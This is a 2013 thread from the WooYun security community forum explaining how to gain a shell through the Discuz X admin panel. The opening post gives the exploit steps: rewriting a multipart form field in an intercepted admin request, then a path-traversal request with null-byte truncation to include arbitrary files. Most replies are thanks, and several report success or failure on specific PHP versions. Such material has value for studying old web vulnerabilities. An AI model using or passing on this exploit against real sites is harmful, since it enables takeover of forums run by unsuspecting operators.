当前位置:WooYun(白帽子技术社区) >> 代码审计 >> dz x 后台怎么拿shell

dz x 后台怎么拿shell

t00000by57 (no exploit) | 2013-05-24 04:57

用户 - 用户栏目 - 栏目分组 抓包
Content-Disposition: form-data; name="settingnew[profilegroupnew][base][available]"
改为
Content-Disposition: form-data; name="settingnew[profilegroupnew][plugin][available]"

访问
/home.php?mod=spacecp&id=../../robots.txt%0057

dz x.png

虽然涉及0x00截断 但无视 GPC

就这样 有钱的捧个钱场 没钱的捧的人场 谢谢

分享到:
60 个回复
  1. 1#
    回复此人 感谢
    Xhm1n9 | 2013-05-24 08:12

    顶个,大半夜的不容易

  2. 2#
    回复此人 感谢
    Cr4zy | 2013-05-24 08:19

    感谢 +1

  3. 3#
    回复此人 感谢
    wefgod (求大牛指点) | 2013-05-24 08:58

    给力啊

  4. 4#
    回复此人 感谢
    乐斗菜菜 | 2013-05-24 08:58

    流弊,这个方法适用 x2  x2.5吗?

  5. 5#
    回复此人 感谢
    HuGtion | 2013-05-24 09:04

    给力

  6. 6#
    回复此人 感谢
    CnCxzSec(衰仔) | 2013-05-24 09:13

    这快天亮了真心不容易 给力!

  7. 7#
    回复此人 感谢
    最热微博 (((‮data;))) | 2013-05-24 09:16

    给力

  8. 8#
    回复此人 感谢
    楼上是马甲 | 2013-05-24 09:23

    x2.5测试成功  厉害

  9. 9#
    回复此人 感谢
    楼上是马甲 | 2013-05-24 09:24

    莫非楼主是toby57的马甲
    我的偶像啊  -_-

  10. 10#
    回复此人 感谢
    Master (小菜一枚) | 2013-05-24 10:04

    不错。。。

  11. 11#
    回复此人 感谢
    龙臣 (你站住了标准,你就成为了标准。) | 2013-05-24 10:16

    不错

  12. 12#
    回复此人 感谢
    bittertea (Bittertea.pw) | 2013-05-24 10:34

    测试一下

  13. 13#
    回复此人 感谢
    xcl0ud | 2013-05-24 10:38

    Mark

  14. 14#
    回复此人 感谢
    xsser (十根阳具有长短!!) | 2013-05-24 10:42

    这兄弟是想拿乌云奖金的节奏啊

  15. 15#
    回复此人 感谢
    saline (碧池就是碧池) | 2013-05-24 10:43

    @楼上是马甲 @t00000by57 表示测试时没有抓到 Content-Disposition 头诶

  16. 16#
    回复此人 感谢
    暴暴 | 2013-05-24 10:45

    好东西啊。。哈哈,等了好久了的一个DZ 后台有救啦!!!

  17. 17#
    回复此人 感谢
    coco | 2013-05-24 10:50

    强悍

  18. 18#
    回复此人 感谢
    debug | 2013-05-24 10:51

    还有其他的办法  呵呵

  19. 19#
    回复此人 感谢
    do9gy | 2013-05-24 11:12

    QQ图片20130524111107.jpg  好像没能截断

  20. 20#
    回复此人 感谢
    cnrstar (Be My Personal Best!) | 2013-05-24 11:18

    牛逼啊、Mark

  21. 21#
    回复此人 感谢
    t00000by57 (no exploit) | 2013-05-24 11:19

    @do9gy php什么版本

  22. 22#
    回复此人 感谢
    saline (碧池就是碧池) | 2013-05-24 11:29

    @t00000by57 致敬!已成功复现!

  23. 23#
    回复此人 感谢
    Sogili (.) 长短短 (.) | 2013-05-24 11:35

    牛逼,已感谢

  24. 24# 感谢(1)
    回复此人 感谢
    酱油甲 | 2013-05-24 11:46

    MARK,已撸

  25. 25#
    回复此人 感谢
    xsser (十根阳具有长短!!) | 2013-05-24 11:48

    @Sogili 怎么现在社区付费意识这么高

  26. 26#
    回复此人 感谢
    saline (碧池就是碧池) | 2013-05-24 12:32

    ww.jpg
    php version 5.2.14
    gpc = on

  27. 27#
    回复此人 感谢
    sinck | 2013-05-24 12:35

    @saline 也木找到

  28. 28#
    回复此人 感谢
    dante | 2013-05-24 12:40

    估计马上要被修复了

  29. 29#
    回复此人 感谢
    P w | 2013-05-24 14:16

    捧个人场。,

  30. 30#
    回复此人 感谢
    DarkSun.Evil | 2013-05-24 14:22

    牛B,真心的!     呃...  似乎也没能截断。

  31. 31# 感谢(1)
    回复此人 感谢
    Passer_by (腾讯微博的Passer-by不是我) | 2013-05-24 17:28

    顶个,大半夜的不容易

  32. 32#
    回复此人 感谢
    GaRY | 2013-05-24 17:34

    @xsser 因为他们有钱人,有wb。我就不敢乱感谢

  33. 33#
    回复此人 感谢
    江南的鱼 | 2013-05-24 20:23

    给了我新希望啊

  34. 34#
    回复此人 感谢
    江南的鱼 | 2013-05-24 20:56

    截断成了悲剧,现在基本都php5.3以上了吧?反正我没能截断,我本地也没有办法生成需要的htm

  35. 35#
    回复此人 感谢
    bittertea (Bittertea.pw) | 2013-05-25 11:23

    测试了一下  没有截断

  36. 36#
    回复此人 感谢
    Vty | 2013-05-26 05:51

    @xsser 你是牛                  逼吗?

  37. 37#
    回复此人 感谢
    Mujj (为何我的眼中饱含泪水?因为我装逼装的深沉) | 2013-05-26 08:21

    discuz X2.5-3.0
    环境php<5.3

  38. 38#
    回复此人 感谢
    do9gy | 2013-05-26 22:38

    @t00000by57   5.4.11

  39. 39#
    回复此人 感谢
    江南的鱼 | 2013-05-27 01:14

    discuz X2 也存在,但是前提是要能截断

  40. 40#
    回复此人 感谢
    My5t3ry | 2013-05-27 20:43

    给力哇

  41. 41#
    回复此人 感谢
    无我 | 2013-05-27 22:15

    只能暴路径?作用不大!

  42. 42#
    回复此人 感谢
    爱上平顶山 (IT民工 职业搬砖 挖坑 丝一枚 神马都不会~) | 2013-05-29 02:09

    @t00000by57     这个怎么抓包?   用什么抓?  谢谢了

  43. 43#
    回复此人 感谢
    剑走偏锋 (贱走偏疯丨Mean deviation.) | 2013-05-30 12:22

    @debug 还有什么办法啊 、

  44. 44#
    回复此人 感谢
    debug | 2013-05-30 20:00

    @剑走偏锋  这个不方便说。

  45. 45#
    回复此人 感谢
    t00000by57 (no exploit) | 2013-05-30 20:06

    @debug 是指前台那个执行么 ..

  46. 46#
    回复此人 感谢
    debug | 2013-05-31 12:51

    @t00000by57 不是前台的  是别的 呵呵

  47. 47#
    回复此人 感谢
    江南的鱼 | 2013-06-01 13:17

    至少还有2个方法能拿shell

  48. 48#
    回复此人 感谢
    漫无目的 (爱好就是天赋) | 2013-06-17 18:52

    同环境下 x2无法截断 x3正常包含

  49. 49#
    回复此人 感谢
    also (阿里山的姑娘没水冲凉) | 2013-06-22 13:48

    出现19楼的问题,坐等解决

  50. 50#
    回复此人 感谢
    小乐天 | 2013-06-25 17:16

    有时间试下

  51. 51#
    回复此人 感谢
    darksn0w | 2013-07-03 15:57

    @漫无目的 你貌似是宝宝。。。。

  52. 52#
    回复此人 感谢
    牛博恩 | 2013-07-12 14:11

    未能截断。

  53. 53#
    回复此人 感谢
    anyis | 2013-08-13 21:02

    @漫无目的 同样的 未能找到可以控制htm的办法.

  54. 54#
    回复此人 感谢
    BlackWidow7 (哇咔咔) | 2013-09-05 18:40

    截断了还要写php脚本来进行一个上传。

  55. 55#
    回复此人 感谢
    书生 | 2013-09-26 13:55

    @江南的鱼 再求一个方法

  56. 56#
    回复此人 感谢
    Forever80s (~~~~~~~~) | 2013-10-17 00:39

    X2 的不能用

  57. 57#
    回复此人 感谢
    路人甲我来了 | 2013-12-06 00:57

    = =这个在linux下不可以用吗?

  58. 58#
    回复此人 感谢
    zeger | 2013-12-10 13:51

    不能截断的也可以进一步利用~

  59. 59#
    回复此人 感谢
    ice (%2F) | 2013-12-10 14:37

    mark

  60. 60#
    回复此人 感谢
    花生^_^ (加强学习~) | 2013-12-10 19:30

    捧个人场~~

添加新回复

登录 后才能参与评论.

WooYun(白帽子技术社区)

网络安全资讯、讨论,跨站师,渗透师,结界师聚集之地

登录

其它内容


Copyright © 2010 www.wooyun.org All Rights Reserved. 吉ICP备12001400号-1